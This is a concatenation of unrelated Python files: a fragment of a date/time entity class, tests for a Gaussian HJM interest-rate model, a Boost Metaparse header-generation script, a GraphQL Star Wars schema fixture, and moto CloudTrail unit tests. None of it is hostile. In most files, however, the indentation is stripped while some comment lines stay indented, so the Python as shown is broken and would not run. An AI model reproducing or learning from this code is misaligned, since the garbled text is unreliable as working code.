+ self._current_datetime.second
)
elif not self.has_time:
extended = datetime.datetime.combine(
self._current_datetime, datetime.time(0, 0)
)
attrs["timestamp"] = extended.timestamp()
else:
attrs["timestamp"] = self._current_datetime.timestamp()
return attrs
def async_set_datetime(self, date_val, time_val):
"""Set a new date / time."""
if self.has_date and self.has_time and date_val and time_val:
self._current_datetime = datetime.datetime.combine(date_val, time_val)
elif self.has_date and not self.has_time and date_val:
self._current_datetime = date_val
        elif self.has_time and not self.has_date and time_val:
self._current_datetime = time_val
self.async_schedule_update_ha_state()
|
|
# Lint as: python3
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Gaussian HJM module."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
@test_util.run_all_in_graph_and_eager_modes
class GaussianHJMModelTest(parameterized.TestCase, tf.test.TestCase):
def setUp(self):
self.instant_forward_rate = lambda *args: [0.01]
# See D. Brigo, F. Mercurio. Interest Rate Models. 2007.
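    # _true_std_time_dep is the closed-form std of the short-rate factor with
    # piecewise-constant vol:
    #   std(t) = exp(-k t) * sqrt(sum_j vol_j^2 / (2 k)
    #                             * (exp(2 k min(t, t_{j+1})) - exp(2 k t_j)))
    # summed over the vol intervals that start before t.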
def _true_std_time_dep(t, intervals, vol, k):
res = np.zeros_like(t, dtype=np.float64)
for i, tt in enumerate(t):
var = 0.0
for j in range(len(intervals) - 1):
if tt >= intervals[j] and tt < intervals[j + 1]:
var = var + vol[j]**2 / 2 / k * (
np.exp(2 * k * tt) - np.exp(2 * k * intervals[j]))
break
else:
var = var + vol[j]**2 / 2 / k * (
np.exp(2 * k * intervals[j + 1]) - np.exp(2 * k * intervals[j]))
else:
          var = var + vol[-1]**2 / 2 / k * (
              np.exp(2 * k * tt) - np.exp(2 * k * intervals[-1]))
        res[i] = np.exp(-k * tt) * np.sqrt(var)
return res
self.true_std_time_dep = _true_std_time_dep
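    # _true_zcb_std is the closed-form std of log zero-coupon-bond prices:
    #   std(t, tau) = (v / k) * (1 - exp(-k (tau - t)))
    #                 * sqrt((1 - exp(-2 k t)) / (2 k))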
def _true_zcb_std(t, tau, v, k):
e_tau = np.exp(-k*tau)
et = np.exp(k*t)
val = v/k * (1. - e_tau*et) * np.sqrt((1.-1./et/et)/k/2)
return val
self.true_zcb_std = _true_zcb_std
super(GaussianHJMModelTest, self).setUp()
@parameterized.named_parameters(
{
'testcase_name': '1f_constant',
'dim': 1,
'mr': [0.03],
'vol': [0.01],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float32,
},
{
'testcase_name': '1f_constant_num_time_steps',
'dim': 1,
'mr': [0.03],
'vol': [0.01],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': 21,
'dtype': tf.float64,
},
{
'testcase_name': '1f_time_dep',
'dim': 1,
'mr': [0.03],
'vol': None,
'corr': None,
'vol_jumps': [[0.5, 1.0]],
'vol_values': [[0.01, 0.02, 0.01]],
'num_time_steps': None,
'dtype': None,
},
{
'testcase_name': '2f_constant',
'dim': 2,
'mr': [0.03, 0.1],
'vol': [0.005, 0.012],
'corr': None,
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float64,
},
{
'testcase_name': '2f_constant_with_corr',
'dim': 2,
'mr': [0.03, 0.1],
'vol': [0.005, 0.012],
'corr': [[1.0, 0.5], [0.5, 1.0]],
'vol_jumps': None,
'vol_values': None,
'num_time_steps': None,
'dtype': tf.float64,
},
{
'testcase_name': '2f_time_dep',
'dim': 2,
'mr': [0.03, 0.1],
'vol': None,
'corr': None,
'vol_jumps': [[0.5, 1.0], [0.5, 1.0]],
'vol_values': [[0.005, 0.008, 0.005], [0.005, 0.008, 0.005]],
'num_time_steps': None,
'dtype': tf.float64,
}
)
def test_correctness_rate_df_sims(self, dim, mr, vol, corr, vol_jumps,
vol_values, num_time_steps, dtype):
"""Tests short rate and discount factor simulations."""
if vol is None:
vol = tff.math.piecewise.PiecewiseConstantFunc(vol_jumps, vol_values,
dtype=dtype)
time_step = None if num_time_steps else 0.1
num_samples = 100000
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
times = np.array([0.1, 0.5, 1.0, 2.0])
paths, df, _, _ = process.sample_paths(
times,
num_samples=num_samples,
time_step=time_step,
num_time_steps=num_time_steps,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[1, 2],
skip=1000000)
if dtype is not None:
with self.subTest('Dtype'):
self.assertEqual(paths.dtype, dtype)
paths = self.evaluate(paths)
df = self.evaluate(df)
with self.subTest('ShapePaths'):
self.assertAllEqual(paths.shape, [num_samples, 4])
with self.subTest('ShapeDiscountFactors'):
self.assertAllEqual(df.shape, [num_samples, 4])
discount_mean = np.mean(df, axis=0)
expected_mean = np.exp(-0.01 * times)
with self.subTest('DiscountMean'):
self.assertAllClose(discount_mean, expected_mean, rtol=1e-3, atol=1e-3)
@parameterized.named_parameters(
{
'testcase_name': '1f_constant',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'factor': 1.0,
},
{
'testcase_name': '2f_constant',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'factor': np.sqrt(2.0),
},
{
'testcase_name': '2f_constant_with_corr',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': [[1.0, 0.5], [0.5, 1.0]],
'factor': np.sqrt(3.0),
}
)
def test_correctness_zcb_sims(self, dim, mr, vol, corr, factor):
"""Tests discount bond simulations."""
dtype = np.float64
num_samples = 100000
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
times = np.array([0.1, 0.5, 1.0, 2.0])
curve_times = np.array([0., 0.5, 1.0, 2.0, 5.0])
paths, _, _ = process.sample_discount_curve_paths(
times,
curve_times=curve_times,
num_samples=num_samples,
time_step=0.1,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[1, 2],
skip=1000000)
self.assertEqual(paths.dtype, dtype)
paths = self.evaluate(paths)
self.assertAllEqual(paths.shape, [num_samples, 5, 4])
sampled_std = tf.math.reduce_std(tf.math.log(paths), axis=0)
for tidx in range(4):
true_std = self.true_zcb_std(times[tidx], curve_times + times[tidx],
0.005, 0.03)
self.assertAllClose(
sampled_std[:, tidx], factor * true_std, rtol=1e-3, atol=1e-3)
@parameterized.named_parameters(
{
'testcase_name': '1f_single_time',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'times': [1.0],
'expected': [0.9803327113840525],
},
{
'testcase_name': '1f_many_times',
'dim': 1,
'mr': [0.03],
'vol': [0.005],
'corr': None,
'times': [1.0, 2.0, 3.0],
'expected': [0.9803327113840525,
0.9803218405347454,
0.9803116028646381],
},
{
'testcase_name': '2f_single_time',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'times': [1.0],
'expected': [0.9707109604475661],
},
{
'testcase_name': '2f_many_times',
'dim': 2,
'mr': [0.03, 0.03],
'vol': [0.005, 0.005],
'corr': None,
'times': [1.0, 2.0, 3.0],
'expected': [0.9707109604475661,
0.9706894322583266,
0.9706691582097785]
}
)
def test_correctness_discount_bond_price(self, dim, mr, vol, corr, times,
expected):
"""Tests discount bond price computation."""
dtype = np.float64
process = tff.models.hjm.GaussianHJM(
dim=dim,
mean_reversion=mr,
volatility=vol,
initial_discount_rate_fn=self.instant_forward_rate,
corr_matrix=corr,
dtype=dtype)
x_t = 0.01 * np.ones(shape=(len(times), dim))
times = np.array(times)
bond_prices = self.evaluate(
process.discount_bond_price(x_t, times, times + 1.0))
self.assertAllEqual(bond_prices.shape, times.shape)
self.assertAllClose(expected, bond_prices, 1e-8, 1e-8)
if __name__ == '__main__':
tf.test.main()
|
|
#!/usr/bin/python
# Copyright Abel Sinkovics ([email protected]) 2015.
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import sys
import argparse
import re
import os
def remove_last_dot(s):
if s.endswith('.'):
return s[:-1]
else:
return s
def remove_newline(s):
return re.sub('[\r\n]', '', s)
def is_definition(s):
cmd = s.strip()
def_prefixes = ['#include ', 'using ', 'struct ', 'template ']
    return any(cmd.startswith(p) for p in def_prefixes) or cmd.endswith(';')
def prefix_lines(prefix, s):
return '\n'.join(['%s%s' % (prefix, l) for l in s.split('\n')])
def protect_metashell(s):
if s.startswith('#include <metashell'):
return '#ifdef __METASHELL\n%s\n#endif' % (s)
else:
return s
def parse_md(qbk):
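    # Scan the quickbook source: two-space indented lines are code snippets;
    # metashell "> " commands inside them are stitched together (handling
    # "...>" continuations and trailing backslashes) and recorded as
    # definitions tagged with the current numbered [section ...] header.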
sections = []
defs = []
current_section = ''
in_cpp_snippet = False
numbered_section_header = re.compile('^\[section *([0-9.]+)')
metashell_command = re.compile('^> [^ ]')
metashell_prompt = re.compile('^(\.\.\.|)>')
msh_cmd = ''
for l in qbk:
if l.startswith(' '):
ll = l[2:]
if not in_cpp_snippet:
in_msh_cpp_snippet = True
if in_msh_cpp_snippet:
if metashell_command.match(ll) or msh_cmd != '':
cmd = metashell_prompt.sub('', remove_newline(ll))
if msh_cmd != '':
msh_cmd = msh_cmd + '\n'
msh_cmd = msh_cmd + cmd
if msh_cmd.endswith('\\'):
msh_cmd = msh_cmd[:-1].strip() + ' '
else:
if not is_definition(msh_cmd):
msh_cmd = '// query:\n%s' % (prefix_lines('// ', msh_cmd))
defs.append((current_section, protect_metashell(msh_cmd.strip())))
msh_cmd = ''
elif not in_cpp_snippet:
in_msh_cpp_snippet = False
in_cpp_snippet = True
else:
in_cpp_snippet = False
m = numbered_section_header.match(l)
if m:
current_section = remove_last_dot(m.group(1)).replace('.', '_')
sections.append(current_section)
    sections.sort(key=lambda s: [int(n) for n in s.split('_')])
return (sections, defs)
def delete_old_headers(path):
for f in os.listdir(path):
if f.endswith('.hpp'):
os.remove(os.path.join(path, f))
def gen_headers(sections, defs, path):
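    # Each generated <section>.hpp includes the previous section's header and
    # adds the definitions collected for that previous section, so the headers
    # accumulate everything defined before a given section.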
files = {}
prev_section = ''
for s in sections:
prev_name = prev_section.replace('_', '.')
include_guard = 'BOOST_METAPARSE_GETTING_STARTED_%s_HPP' % (s)
if prev_section == '':
prev_include = ''
else:
prev_include = \
'// Definitions before section {0}\n'.format(prev_name) + \
'#include "{0}.hpp"\n'.format(prev_section) + \
'\n'
files[os.path.join(path, s + '.hpp')] = \
'#ifndef {0}\n'.format(include_guard) + \
'#define {0}\n'.format(include_guard) + \
'\n' + \
'// Automatically generated header file\n' + \
'\n' + \
prev_include + \
'// Definitions of section {0}\n'.format(prev_name) + \
'\n'.join( \
['%s\n' % (d) for (sec, d) in defs if sec == prev_section] \
) + \
'\n' + \
'#endif\n' + \
'\n'
prev_section = s
return files
def remove_metashell_protection(s):
prefix = '#ifdef __METASHELL\n'
suffix = '#endif'
return \
s[len(prefix):-len(suffix)] \
if s.startswith(prefix) and s.endswith(suffix) \
else s
def make_code_snippet(s):
return '\n'.join([' {0}'.format(l) for l in s.split('\n')])
def what_we_have_so_far_docs(doc_dir, qbk, defs, sections):
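    # Build one before_<section>.qbk page per section listing everything
    # defined up to that point, and rewrite the guide so the sections that
    # have definitions link to their page from the "[note Note that ..." note.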
files = {}
so_far = ''
sections_with_definition = []
for s in sections:
if so_far != '':
files[os.path.join(doc_dir, 'before_{0}.qbk'.format(s))] = \
'[#before_{0}]\n[\'Definitions before section {1}]\n\n{2}\n'.format(
s,
s.replace('_', '.') + '.',
so_far
)
sections_with_definition.append(s)
so_far = so_far + '\n'.join([
'{0}\n'.format(make_code_snippet(remove_metashell_protection(d)))
for (sec, d) in defs
if sec == s and not d.startswith('//')
])
is_section = re.compile('^\[section (([0-9]\.)+)')
note_prefix = \
'[note Note that you can find everything that has been included and' \
' defined so far [link before_'
in_definitions_before_each_section = False
result = []
for l in qbk:
if in_definitions_before_each_section:
if l.strip() == '[endsect]':
in_definitions_before_each_section = False
result.append(l)
elif l.strip() == '[section Definitions before each section]':
in_definitions_before_each_section = True
result.append(l)
result.append('\n')
for s in sections_with_definition:
result.append('[include before_{0}.qbk]\n'.format(s))
result.append('\n')
elif not l.startswith(note_prefix):
result.append(l)
m = is_section.match(l)
if m:
section_number = m.group(1).replace('.', '_')[:-1]
if section_number in sections_with_definition:
result.append('{0}{1} here].]\n'.format(note_prefix, section_number))
return (files, result)
def strip_not_finished_line(s):
s = s.strip()
return s[:-1] if s.endswith('\\') else s
def make_copy_paste_friendly(lines):
result = []
for l in lines:
if l.startswith('> '):
result.append(l[2:])
elif l.startswith('...> '):
result[-1] = strip_not_finished_line(result[-1]) + l[5:].lstrip()
return result
def extract_code_snippets(qbk, fn_base):
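    # Pull the metashell commands of each indented snippet into their own
    # <fn_base>_<n>.qbk file (for snippets with more than one command), link a
    # "copy-paste friendly version" from the original snippet, and list the
    # generated files in the "Copy-paste friendly code examples" section.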
code_prefix = ' '
files = {}
result = []
in_cpp_code = False
counter = 0
in_copy_paste_friendly_examples = False
skip_empty_lines = False
for l in qbk:
if l.strip() != '' or not skip_empty_lines:
skip_empty_lines = False
if in_copy_paste_friendly_examples:
if 'endsect' in l:
in_copy_paste_friendly_examples = False
result.append('\n')
result.extend([
'[include {0}_{1}.qbk]\n'.format(re.sub('^.*/', '', fn_base), i) \
for i in range(0, counter)
])
result.append('\n')
result.append(l)
in_copy_paste_friendly_examples = False
elif '[section Copy-paste friendly code examples]' in l:
in_copy_paste_friendly_examples = True
result.append(l)
elif 'copy-paste friendly version' in l:
skip_empty_lines = True
else:
result.append(l)
if in_cpp_code:
if not l.startswith(code_prefix):
in_cpp_code = False
if len(code) > 1:
f = '{0}_{1}'.format(fn_base, counter)
basename_f = re.sub('^.*/', '', f)
files['{0}.qbk'.format(f)] = \
'[#{0}]\n\n{1}\n'.format(
basename_f,
''.join(
[code_prefix + s for s in make_copy_paste_friendly(code)]
)
)
result.append(
'[link {0} copy-paste friendly version]\n'.format(basename_f)
)
result.append('\n')
counter = counter + 1
elif \
l.startswith(code_prefix + '> ') \
or l.startswith(code_prefix + '...> '):
code.append(l[len(code_prefix):])
elif l.startswith(code_prefix):
in_cpp_code = True
code = [l[len(code_prefix):]]
return (files, result)
def write_file(fn, content):
with open(fn, 'w') as f:
f.write(content)
def write_files(files):
for fn in files:
write_file(fn, files[fn])
def main():
desc = 'Generate headers with the definitions of a Getting Started guide'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'--src',
dest='src',
default='doc/getting_started.qbk',
help='The .qbk source of the Getting Started guide'
)
parser.add_argument(
'--dst',
dest='dst',
default='example/getting_started',
help='The target directory to generate into (all headers in that directory will be deleted!)'
)
args = parser.parse_args()
qbk = open(args.src, 'r').readlines()
delete_old_headers(args.dst)
doc_dir = os.path.dirname(args.src)
(sections, defs) = parse_md(qbk)
files1 = gen_headers(sections, defs, args.dst)
(files2, qbk) = what_we_have_so_far_docs(doc_dir, qbk, defs, sections)
(files3, qbk) = \
extract_code_snippets(
qbk,
args.src[:-4] if args.src.endswith('.qbk') else args.src
)
write_files(files1)
write_files(files2)
write_files(files3)
write_file(args.src, ''.join(qbk))
if __name__ == "__main__":
main()
|
|
import asyncio
from graphql import (
GraphQLArgument,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInt,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLSchema,
GraphQLString,
get_introspection_query,
graphql_sync,
print_schema,
)
from .fixtures import (
create_review,
get_characters,
get_droid,
get_friends,
get_hero_async,
get_human,
reviews,
)
episode_enum = GraphQLEnumType(
"Episode",
{
"NEWHOPE": GraphQLEnumValue(4, description="Released in 1977.",),
"EMPIRE": GraphQLEnumValue(5, description="Released in 1980.",),
"JEDI": GraphQLEnumValue(6, description="Released in 1983.",),
},
description="One of the films in the Star Wars Trilogy",
)
human_type: GraphQLObjectType
droid_type: GraphQLObjectType
character_interface = GraphQLInterfaceType(
"Character",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the character."
),
"name": GraphQLField(GraphQLString, description="The name of the character."),
"friends": GraphQLField(
GraphQLList(character_interface), # type: ignore
description="The friends of the character,"
" or an empty list if they have none.",
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in."
),
},
resolve_type=lambda character, _info, _type: {
"Human": human_type.name,
"Droid": droid_type.name,
}[character.type],
description="A character in the Star Wars Trilogy",
)
human_type = GraphQLObjectType(
"Human",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the human.",
),
"name": GraphQLField(GraphQLString, description="The name of the human.",),
"friends": GraphQLField(
GraphQLList(character_interface),
description="The friends of the human, or an empty list if they have none.",
resolve=lambda human, _info: get_friends(human),
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in.",
),
"homePlanet": GraphQLField(
GraphQLString,
description="The home planet of the human, or null if unknown.",
),
},
interfaces=[character_interface],
description="A humanoid creature in the Star Wars universe.",
)
droid_type = GraphQLObjectType(
"Droid",
lambda: {
"id": GraphQLField(
GraphQLNonNull(GraphQLString), description="The id of the droid.",
),
"name": GraphQLField(GraphQLString, description="The name of the droid.",),
"friends": GraphQLField(
GraphQLList(character_interface),
description="The friends of the droid, or an empty list if they have none.",
resolve=lambda droid, _info: get_friends(droid),
),
"appearsIn": GraphQLField(
GraphQLList(episode_enum), description="Which movies they appear in.",
),
"primaryFunction": GraphQLField(
GraphQLString, description="The primary function of the droid.",
),
},
interfaces=[character_interface],
description="A mechanical creature in the Star Wars universe.",
)
review_type = GraphQLObjectType(
"Review",
lambda: {
"episode": GraphQLField(episode_enum, description="The movie"),
"stars": GraphQLField(
GraphQLNonNull(GraphQLInt),
description="The number of stars this review gave, 1-5",
),
"commentary": GraphQLField(
GraphQLString, description="Comment about the movie"
),
},
description="Represents a review for a movie",
)
review_input_type = GraphQLInputObjectType(
"ReviewInput",
lambda: {
"stars": GraphQLInputField(GraphQLInt, description="0-5 stars"),
"commentary": GraphQLInputField(
GraphQLString, description="Comment about the movie, optional"
),
},
description="The input object sent when someone is creating a new review",
)
query_type = GraphQLObjectType(
"Query",
lambda: {
"hero": GraphQLField(
character_interface,
args={
"episode": GraphQLArgument(
episode_enum,
description="If omitted, returns the hero of the whole saga. If "
"provided, returns the hero of that particular episode.",
)
},
            resolve=lambda _source, _info, episode=None: get_hero_async(episode),
),
"human": GraphQLField(
human_type,
args={
"id": GraphQLArgument(
description="id of the human", type_=GraphQLNonNull(GraphQLString),
)
},
            resolve=lambda _source, _info, id: get_human(id),
),
"droid": GraphQLField(
droid_type,
args={
"id": GraphQLArgument(
description="id of the droid", type_=GraphQLNonNull(GraphQLString),
)
},
resolve=lambda _source, _info, id: get_droid(id),
),
"characters": GraphQLField(
GraphQLList(character_interface),
args={
"ids": GraphQLArgument(
GraphQLList(GraphQLString), description="list of character ids",
)
},
resolve=lambda _source, _info, ids=None: get_characters(ids),
),
},
)
mutation_type = GraphQLObjectType(
"Mutation",
lambda: {
"createReview": GraphQLField(
review_type,
args={
"episode": GraphQLArgument(
episode_enum, description="Episode to create review",
),
"review": GraphQLArgument(
description="set alive status", type_=review_input_type,
),
},
resolve=lambda _source, _info, episode=None, review=None: create_review(
episode, review
),
),
},
description="The mutation type, represents all updates we can make to our data",
)
async def subscribe_reviews(_root, _info, episode):
for review in reviews[episode]:
yield review
await asyncio.sleep(0.1)
async def resolve_review(review, _info, **_args):
return review
subscription_type = GraphQLObjectType(
"Subscription",
lambda: {
"reviewAdded": GraphQLField(
review_type,
args={
"episode": GraphQLArgument(
episode_enum, description="Episode to review",
)
},
subscribe=subscribe_reviews,
resolve=resolve_review,
)
},
)
StarWarsSchema = GraphQLSchema(
query=query_type,
mutation=mutation_type,
subscription=subscription_type,
types=[human_type, droid_type, review_type, review_input_type],
)
StarWarsIntrospection = graphql_sync(StarWarsSchema, get_introspection_query()).data
StarWarsTypeDef = print_schema(StarWarsSchema)
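# Example usage (illustrative): fields with synchronous resolvers can be
# queried with graphql_sync, e.g.
#
#     result = graphql_sync(StarWarsSchema, '{ droid(id: "2001") { name } }')
#
# assuming the fixtures define a droid with that id; async resolvers such as
# "hero" and the subscription require graphql() under an event loop.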
|
|
"""Unit tests for cloudtrail-supported APIs."""
import boto3
import pytest
import sure # noqa # pylint: disable=unused-import
from botocore.exceptions import ClientError
from datetime import datetime
from moto import mock_cloudtrail, mock_s3, mock_sns
from moto.core import ACCOUNT_ID
from uuid import uuid4
@mock_s3
@mock_cloudtrail
def test_create_trail_without_bucket():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname", S3BucketName="specificweirdbucketthatdoesnotexist"
)
err = exc.value.response["Error"]
err["Code"].should.equal("S3BucketDoesNotExistException")
err["Message"].should.equal(
"S3 bucket specificweirdbucketthatdoesnotexist does not exist!"
)
@pytest.mark.parametrize(
"name,message",
[
(
"a",
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters.",
),
(
"aa",
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 2 characters.",
),
(
"a" * 129,
"Trail name too long. Maximum allowed length: 128 characters. Specified name length: 129 characters.",
),
("trail!", "Trail name must ends with a letter or number."),
(
"my#trail",
"Trail name or ARN can only contain uppercase letters, lowercase letters, numbers, periods (.), hyphens (-), and underscores (_).",
),
("-trail", "Trail name must starts with a letter or number."),
],
)
@mock_cloudtrail
def test_create_trail_invalid_name(name, message):
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name=name, S3BucketName="specificweirdbucketthatdoesnotexist"
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(message)
@mock_cloudtrail
@mock_s3
def test_create_trail_simple():
bucket_name, resp, trail_name = create_trail_simple()
resp.should.have.key("Name").equal(trail_name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.shouldnt.have.key("S3KeyPrefix")
resp.shouldnt.have.key("SnsTopicName")
resp.shouldnt.have.key("SnsTopicARN")
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(False)
resp.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{trail_name}"
)
resp.should.have.key("LogFileValidationEnabled").equal(False)
resp.should.have.key("IsOrganizationTrail").equal(False)
return resp
def create_trail_simple(region_name="us-east-1"):
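    # Helper shared by several tests: creates a uniquely named bucket and
    # trail, and returns (bucket_name, create_trail response, trail_name).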
client = boto3.client("cloudtrail", region_name=region_name)
s3 = boto3.client("s3", region_name="us-east-1")
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
trail_name = str(uuid4())
resp = client.create_trail(Name=trail_name, S3BucketName=bucket_name)
return bucket_name, resp, trail_name
@mock_cloudtrail
def test_create_trail_multi_but_not_global():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname",
S3BucketName="non-existent",
IncludeGlobalServiceEvents=False,
IsMultiRegionTrail=True,
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidParameterCombinationException")
# Note that this validation occurs before the S3 bucket is validated
err["Message"].should.equal(
"Multi-Region trail must include global service events."
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_create_trail_with_nonexisting_topic():
client = boto3.client("cloudtrail", region_name="us-east-1")
s3 = boto3.client("s3", region_name="us-east-1")
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
client.create_trail(
Name="mytrailname",
S3BucketName=bucket_name,
SnsTopicName="nonexistingtopic",
)
err = exc.value.response["Error"]
err["Code"].should.equal("InsufficientSnsTopicPolicyException")
err["Message"].should.equal(
"SNS Topic does not exist or the topic policy is incorrect!"
)
@mock_cloudtrail
@mock_s3
@mock_sns
def test_create_trail_advanced():
bucket_name, resp, sns_topic_name, trail_name = create_trail_advanced()
resp.should.have.key("Name").equal(trail_name)
resp.should.have.key("S3BucketName").equal(bucket_name)
resp.should.have.key("S3KeyPrefix").equal("s3kp")
resp.should.have.key("SnsTopicName").equal(sns_topic_name)
resp.should.have.key("SnsTopicARN").equal(
f"arn:aws:sns:us-east-1:{ACCOUNT_ID}:{sns_topic_name}"
)
resp.should.have.key("IncludeGlobalServiceEvents").equal(True)
resp.should.have.key("IsMultiRegionTrail").equal(True)
resp.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{trail_name}"
)
resp.should.have.key("LogFileValidationEnabled").equal(True)
resp.should.have.key("IsOrganizationTrail").equal(True)
resp.should.have.key("CloudWatchLogsLogGroupArn").equals("cwllga")
resp.should.have.key("CloudWatchLogsRoleArn").equals("cwlra")
resp.should.have.key("KmsKeyId").equals("kki")
def create_trail_advanced(region_name="us-east-1"):
client = boto3.client("cloudtrail", region_name=region_name)
s3 = boto3.client("s3", region_name="us-east-1")
sns = boto3.client("sns", region_name=region_name)
bucket_name = str(uuid4())
s3.create_bucket(Bucket=bucket_name)
sns_topic_name = "cloudtrailtopic"
sns.create_topic(Name=sns_topic_name)
trail_name = str(uuid4())
resp = client.create_trail(
Name=trail_name,
S3BucketName=bucket_name,
S3KeyPrefix="s3kp",
SnsTopicName=sns_topic_name,
IncludeGlobalServiceEvents=True,
IsMultiRegionTrail=True,
EnableLogFileValidation=True,
IsOrganizationTrail=True,
CloudWatchLogsLogGroupArn="cwllga",
CloudWatchLogsRoleArn="cwlra",
KmsKeyId="kki",
TagsList=[{"Key": "tk", "Value": "tv"}, {"Key": "tk2", "Value": "tv2"}],
)
return bucket_name, resp, sns_topic_name, trail_name
@mock_cloudtrail
def test_get_trail_with_one_char():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail(Name="?")
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters."
)
@mock_cloudtrail
def test_get_trail_unknown():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail(Name="unknowntrail")
err = exc.value.response["Error"]
err["Code"].should.equal("TrailNotFoundException")
err["Message"].should.equal(
f"Unknown trail: unknowntrail for the user: {ACCOUNT_ID}"
)
@mock_cloudtrail
def test_get_trail():
test_create_trail_simple()
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, name = create_trail_simple()
trail = client.get_trail(Name=name)["Trail"]
trail.should.have.key("Name").equal(name)
trail.should.have.key("IncludeGlobalServiceEvents").equal(True)
trail.should.have.key("IsMultiRegionTrail").equal(False)
trail.should.have.key("TrailARN").equal(
f"arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/{name}"
)
@mock_cloudtrail
def test_get_trail_status_with_one_char():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail_status(Name="?")
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidTrailNameException")
err["Message"].should.equal(
"Trail name too short. Minimum allowed length: 3 characters. Specified name length: 1 characters."
)
@mock_cloudtrail
def test_get_trail_status_unknown_trail():
client = boto3.client("cloudtrail", region_name="us-east-1")
with pytest.raises(ClientError) as exc:
client.get_trail_status(Name="unknowntrail")
err = exc.value.response["Error"]
err["Code"].should.equal("TrailNotFoundException")
err["Message"].should.equal(
f"Unknown trail: arn:aws:cloudtrail:us-east-1:{ACCOUNT_ID}:trail/unknowntrail for the user: {ACCOUNT_ID}"
)
@mock_cloudtrail
@mock_s3
def test_get_trail_status_inactive():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, _, trail_name = create_trail_simple()
status = client.get_trail_status(Name=trail_name)
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key("LatestDeliveryAttemptSucceeded").equal("")
status.should.have.key("TimeLoggingStarted").equal("")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StartLoggingTime")
@mock_cloudtrail
@mock_s3
def test_get_trail_status_arn_inactive():
client = boto3.client("cloudtrail", region_name="us-east-1")
_, resp, _ = create_trail_simple()
status = client.get_trail_status(Name=resp["TrailARN"])
status.should.have.key("IsLogging").equal(False)
status.should.have.key("LatestDeliveryAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptTime").equal("")
status.should.have.key("LatestNotificationAttemptSucceeded").equal("")
status.should.have.key("LatestDeliveryAttemptSucceeded").equal("")
status.should.have.key("TimeLoggingStarted").equal("")
status.should.have.key("TimeLoggingStopped").equal("")
status.shouldnt.have.key("StartLoggingTime")
@mock_cloudtrail
